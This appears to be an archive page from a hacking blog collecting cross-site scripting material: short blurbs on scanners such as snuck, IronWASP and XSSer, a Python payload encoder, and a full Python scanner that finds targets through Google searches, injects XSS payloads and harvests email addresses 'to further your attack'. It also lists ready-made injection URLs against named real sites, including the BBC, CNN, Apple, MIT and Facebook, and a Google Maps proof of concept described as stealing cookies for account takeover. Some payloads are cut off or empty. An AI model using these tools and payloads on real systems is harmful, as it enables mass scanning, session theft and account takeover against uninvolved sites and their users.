snuck automatic XSS filter bypass
snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. The approach, it adopts, is based on the inspection of the injection's reflection context and relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser, a real web browser is driven for reproducing the attacker's behavior and possibly the victim's.
Description
snuck is quite different from typical web security scanners, it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is the exact point where the injection falls in the reflection web page's DOM. Having access to the pages' DOM is possible through Selenium Web Driver, which is an automation framework, that allows to replicate operations in web browsers. Since many steps could be involved before an XSS filter is "activated", an XML configuration file should be filled in order to make snuck aware of the steps it needs to perform with respect to the tested web application. Practically speaking, the approach is similar to the iSTAR's one, but it focuses on one particular XSS filter.
Download here
IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Learn more about it here | Download from here
Passive Plug-ins
- Analyzes all traffic going through the tool
- Can also modify the traffic
- Identifies vulnerabilities passively
Eg: Passwords sent over clear-text, Http-Only /Secure flag missing in cookies
Active Plug-ins
- Performs scans against the target to
- identify vulnerabilities
- Executed only when the user explicitly
- calls them
- Fine-grained scanning support
Eg: Cross-site Scripting, SQL Injection
IronWASP performs Taint Analysis forDOM based XSS, identifies Sources and Sinks and traces them through the code. Also custom Source and Sink objects can be configured.
Joomscan Security Scanner Updated
Joomscan Security Scanner updated recently with new database have 550 vulnerabilities. Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla web site. Last update for this tool was in August, 2009 with 466 vulnerabilities.
In joomscan you can check for new updates with command:
./joomscan.pl check or ./joomscan.pl update.
Download for Windows (141 KB)
Download for Linux (150 KB)
Python XSS payload encoder
[cc lang="python"]'''
Python XSS payload encoder
Author: BGS (rstcenter.com)
Contributor cmiN (rstcenter.com)
Date: 13 August 2011
Version: Python 2.7
'''
#!/usr/bin/env python
import time
import sys
import urllib2
import base64
def main():
try:
if sys.argv[1] == "help":
print '[-]'+time.ctime()
print'''[-]Instructions:
encoder.py
Available encodings: ascii b64 hex url
[-]Exiting...
'''
elif sys.argv[1] == "b64":
b64_encode()
elif sys.argv[1] == "ascii":
ascii_encode()
elif sys.argv[1] == "hex":
hex_encode()
elif sys.argv[1] == "url":
url_encode()
else:
sys.exit(1)
except Exception, e:
print 'Type "encoder.py help" for instructions! '
sys.exit(1)
def b64_encode():
payload = sys.argv[2]
encoded = base64.standard_b64encode(payload)
print ' ################## B64 String #######################'
print ''
print 'String:' + encoded
print ''
print "#################### >>EOF<< #########################"
def ascii_encode():
payload = sys.argv[2]
string = ''
for w in payload:
string += str(ord(w)) + ","
print ' ################## ASCII String #####################'
print ''
print 'string.fromCharCode(' + string.strip(",") +')'
print ''
print "#################### >>EOF<< #########################"
def hex_encode():
payload = sys.argv[2]
encoded = payload.encode('hex')
print ' ################## HEX String #######################'
print ''
print 'String:' + encoded
print ''
print "#################### >>EOF<< #########################"
def url_encode():
payload = sys.argv[2]
encoded = urllib2.quote(payload.encode("utf8"))
print ' ################## URL String #######################'
print ''
print 'String:' + encoded
print ''
print "#################### >>EOF<< #########################"
if __name__ == '[/cc]
vBulletin Cross Site Scripting Vulnerability
Vulnerable versions: 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1
PoC:
[cc lang="html"]http://www.example.com/forums/admincp/?";>[/cc]
Happy educational purpose testing! 
facebook xss
Facebook.com xss. you have to be log out
[cc lang="html"]http://www.facebook.com/r.php?fbpage_id=14077031341&r=111&next=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fscriptalertdocumentcookiescript%2F14077031341[/cc]
python xss scanner
[cc lang="python"]#!/usr/bin/python
#XSS Scanner that can find hosts using a google query or search one site.
#If XSS is found it attempts to collect email addresses to further your attack
#or warn the target of the flaw. When the scan is complete
#it will print out the XSS's found and or write to file, it will find false positives
#so manually check before getting to excited. It also has verbose mode and
#you can change the alert pop-up message, check options!!
#
##Changelog v1.1: added options, verbose, write to file, change alert
#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback
#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)
#
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, sets, random, httplib, time, socket
def title():
print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3"
print "\t-----------------------------------------------"
def usage():
title()
print "\n Usage: python XSSscan.py
def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def geturls(query):
counter = 10
urls = []
while counter < int(sys.argv[3]):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls
def getemails(site):
try:
if site.split("/",1)[0] not in done:
print "\t[+] Collecting Emails:",site.split("/",1)[0]
webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read()
emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
done.append(site.split("/",1)[0])
if emails:
return emails
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except(IndexError):
pass
def getvar(site):
names = []
actions = []
print "\n","-"*45
print "[+] Searching:",site
try:
webpage = urllib2.urlopen(proto+"://"+site, port).read()
emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
var = re.findall("\?[\w\.\-/]*\=",webpage)
if len(var) >=1:
var = list(sets.Set(var))
found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower())
found_action = list(sets.Set(found_action))
if len(found_action) >= 1:
for a in found_action:
a = a.split('"',2)[1]
try:
if a[0] != "/":
a = "/"+a
except(IndexError):
pass
actions.append(a)
found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower())
found_names = list(sets.Set(found_names))
for n in found_names:
names.append(n.split('"',2)[1])
print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)
print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads)
if len(var) >= 1:
for v in var:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+"/"+v+xss)
for xss in xss_payloads:
tester(site+"/"+v+xss)
if len(names) >= 1:
for n in names:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss)
for xss in xss_payloads:
tester(site+"/"+"?"+n+"="+xss)
if len(actions) != 0 and len(names) >= 1:
for a in actions:
for n in names:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss)
#tester(site.split("/")[0]+a+"?"+n+"="+xss)
if len(actions) != 0 and len(var) >= 1:
for a in actions:
for v in var:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+a+v+xss)
else:
for xss in xss_payloads:
tester(site.split("/")[0]+a+v+xss)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
urls.remove(site)
except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror):
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
urls.remove(site)
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
def tester(target):
if verbose ==1:
if message != "":
print "Target:",target.replace(alert ,message)
else:
print "Target:",target
try:
source = urllib2.urlopen(proto+"://"+target, port).read()
h = httplib.HTTPConnection(target.split('/')[0], int(port))
try:
h.request("GET", "/"+target.split('/',1)[1])
except(IndexError):
h.request("GET", "/")
r1 = h.getresponse()
if verbose ==1:
print "\t[+] Response:",r1.status, r1.reason
if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418):
if target not in found_xss:
if message != "":
print "\n[!] XSS:", target.replace(alert ,message)
else:
print "\n[!] XSS:", target
print "\t[+] Response:",r1.status, r1.reason
emails = getemails(target)
if emails:
print "\t[+] Email:",len(emails),"addresses\n"
found_xss.setdefault(target, list(sets.Set(emails)))
else:
found_xss[target] = "None"
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass
if len(sys.argv) <= 2:
usage()
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-a" or arg.lower() == "-alert":
message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2])
title()
socket.setdefaulttimeout(3)
found_xss = {}
done = []
count = 0
proto = "http"
alert = "D3HYDR8%2D0wNz%2DY0U"
print "\n[+] XSS_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
try:
if message:
print "[+] Alert:",message
except(NameError):
print "[+] Alert:",alert
message = ""
pass
xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E",
"%22%3E",
"%22%3E",
"'';!--\"<%27"+alert+"%27>=&{()}",
"';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function",
""]
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
print "[+] XSS Payloads:",len(xss_payloads)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
try:
if sys.argv[3].isdigit() == False:
print "\n[-] Argument [",sys.argv[3],"] must be a number.\n"
sys.exit(1)
else:
if int(sys.argv[3]) <= 10:
print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n"
sys.exit(1)
except(IndexError):
print "\n[-] Need number of hosts to collect.\n"
sys.exit(1)
query = re.sub("\s","+",sys.argv[2])
port = "80"
print "[+] Query:",query
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "\n[-] Cancel: Press Ctrl-C"
time.sleep(3)
while len(urls) > 0:
print "-"*45
print "\n[-] Length:",len(urls),"remain"
getvar(random.choice(urls))
if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site":
site = sys.argv[2]
try:
if sys.argv[3].isdigit() == False:
port = "80"
else:
port = sys.argv[3]
except(IndexError):
port = "80"
print "[+] Site:",site
print "[+] Port:",port
if site[:7] == "http://":
site = site.replace("http://","")
if site[:8] == "https://":
proto = "https"
if port == "80":
print "[!] Using port 80 with https? (443)"
site = site.replace("https://","")
print "[+] Started:",timer()
print "\n[-] Cancel: Press Ctrl-C"
time.sleep(4)
getvar(site)
print "-"*65
print "\n\n[+] Potential XSS found:",len(found_xss),"\n"
time.sleep(3)
if txt != None and len(found_xss) >=1:
xss_file = open(txt, "a")
xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n")
xss_file.writelines("\t------------------------------------------\n\n")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_xss.keys():
count+=1
if txt != None:
if message != "":
xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n")
else:
xss_file.writelines("["+str(count)+"] "+k+"\n")
if message != "":
print "\n["+str(count)+"]",k.replace(alert ,message)
else:
print "\n["+str(count)+"]",k
addrs = found_xss[k]
if addrs != "None":
print "\t[+] Email addresses:"
for addr in addrs:
if txt != None:
xss_file.writelines("\tEmail: "+addr+"\n")
print "\t -",addr
print "\n[-] Done -",timer(),"\n"[/cc]
xss in gamespy.com, bbc.co.uk, majorgeeks.com, cnn.com, apple.com, mit.edu, archive.org
List of working XSS:
gamespy.com
[cc lang="html"]http://planetcrysis.gamespy.com/screenshots/index.php?view=ss&ss=95--%3E%22%3E%3C
/script%3E%3Cscript%3Ealert(3348399)%3C/script%3Epage=1&commentpage=98&&[/cc]
bbc.co.uk
[cc lang="html"]http://footballplayer.5live.external.bbc.co.uk/football-player/index.php?Feedback--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%283348399%29%3C/script%3E& [/cc]
majorgeeks.com
[cc lang="html"]http://www.majorgeeks.com/downloadget.php?id=6257&file=1&evp=cfe61914b9aeeeb418fd0fc56c7477dd--%3E%22%3E%3C/script%3E%3Cscript%3Ealert(3348399)%3C/script%3E& [/cc]
cnn.com
[cc lang="html"]http://mexico.cnn.com/videos/2011/03/22/mexico-nuevo-presidente-en-el-prd--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%283348399%29%3C/script%3E [/cc]
apple.com
[cc lang="html"]http://consultants.apple.com/au/reviews.php?location=001C000000nCBDK--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%283348399%29%3C/script%3E& [/cc]
mit.edu
[cc lang="html"]http://prism.mit.edu/LabSched/roschedule.php?date=05-23-2011&scheduleid=sc143c7e920a4086--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%283348399%29%3C/script%3E& [/cc]
archive.org
[cc lang="html"]http://www.archive.org/browse.php?field=subject--%3E%22%3E%3C/script%3E%3Cscript%3Ealert(3348399)%3C/script%3Emediatype=texts&collection=sauk_valley&& [/cc]
Credits 3348399 at rstcenter.com
I DO not encourage anyone to visit any of the links above and I will take no responsibility for any damage caused by this post.
working xss in google
The latest unpublished XSS for which I got in the Hall of Fame is still unpatched.
Here is the PoC I sent Google:
http://maps.google.com/?z=4&pw=2
And insert this inside the notes:
[cc lang="html"]
[/cc]
The PoC we sent to Google is located here.
It will give us your cookie with which we can take over your Google account including things like gmail and youtube so beware!
For a simple PoC you probably just want to go to:
http://maps.google.com/?z=4&pw=2
And insert this in the notes:
[cc lang="html"][/cc]
Source here: http://h.ackack.net/unfixed-google-hack.html
XSSer Cross Site Scripter Download
Cross Site "Scripter" (aka XSSer) is an automatic -framework- to:
● Detect XSS flaws in web-based aplications.
● Exploit -local/remote- code “on wild”.
● Report founded vulnerabilities in real time to community.
● XSS flaws occur whenever an application takes untrusted data
and sends it to a web browser without proper validation and escaping.
● XSS allows attackers to execute scripts in the victim’s browser
which can hijack user sessions, deface web sites, or redirect the user to
malicious sites.
A penetration testing tool for detecting and exploiting XSS vulnerabilites.
Website | Group | Presentation | Download | Twitter
Disclaimer
Categories
- android (1)
- antivirus (1)
- backup (1)
- backup exec (2)
- bruteforce (6)
- conference (2)
- CRSF (2)
- DirectAdmin (1)
- DoS (11)
- enumeration (2)
- Fără categorie (2)
- flash (2)
- Fuzzer (2)
- games (1)
- hacking (116)
- how-to (32)
- Information gathering (2)
- lfi (3)
- linux (27)
- mobile (1)
- ms exchange (2)
- News (2)
- Phishing (1)
- php (1)
- rdp (1)
- rfi (5)
- rootkit (1)
- scripts (33)
- seo (1)
- sniff (3)
- social engineering (2)
- source code (33)
- sqli (16)
- ssh (2)
- symantec (3)
- tools (73)
- tutorials (20)
- tutorials (1)
- Uncategorized (7)
- vranger (1)
- windows (12)
- wireless (1)
- wsus (1)
- xpath (1)
- xsrf (1)
- xss (12)
